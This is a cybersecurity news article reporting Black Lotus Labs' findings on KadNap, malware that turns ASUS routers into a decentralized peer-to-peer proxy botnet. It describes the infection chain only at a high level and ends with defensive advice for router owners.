Cybersecurity researchers have found a new malware strain called KadNap. That malware is mainly targeting ASUS routers and turning them into part of a botnet which is used to route malicious internet traffic.
According to researchers from Black Lotus Labs, the activity was first noticed in August 2025. And now more than 14,000 devices have been infected. Over 60% of the affected devices are located in the United States, while smaller numbers have been identified in countries including Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy, and Spain.
KadNap takes a different approach compared to many other botnets. Rather than relying on one central command server, it links infected devices together in a peer-to-peer network. Using a modified Kademlia DHT protocol, the malware can hide the attacker’s infrastructure and make the activity more difficult for security teams to detect.
Through this setup, infected routers can communicate directly with other compromised devices. They can locate peers, exchange information, and receive instructions without relying on one central server. This decentralized approach makes the botnet more resilient and difficult to shut down.
Researchers found that the infected routers are being used by a proxy service called Doppelgänger, which claims to offer residential proxies across more than 50 countries. The service is believed to be a rebranded version of Faceless, another proxy network previously linked to TheMoon malware. Through these services, cybercriminals can route traffic through real household IP addresses to hide the true origin of their activity.
The infection process begins with a shell script called “aic.sh” that is downloaded from a command-and-control server. This script creates a scheduled task that repeatedly reconnects to the server and downloads additional malicious files. One of these files installs the KadNap malware itself, which can run on routers using ARM or MIPS processors.
KadNap also connects to a Network Time Protocol (NTP) server to collect timing and system data. This information is used to generate a hash that helps the malware discover other peers in the decentralized network. Additional scripts can close port 22 (SSH) and load lists of command servers used by the botnet. The botnet stands out because its decentralized design makes it difficult to track and shut down.
Users are advised to:
- Install the latest router firmware updates
- Change default login credentials
- Disable remote management features unless absolutely necessary
- Replace devices that no longer receive security updates
While a compromised router might continue working normally, it could still be quietly helping power a cybercrime infrastructure in the background.
Caught feelings for cybersecurity? It’s okay, it happens. Follow us on LinkedIn, Youtube and Instagram to keep the spark alive.
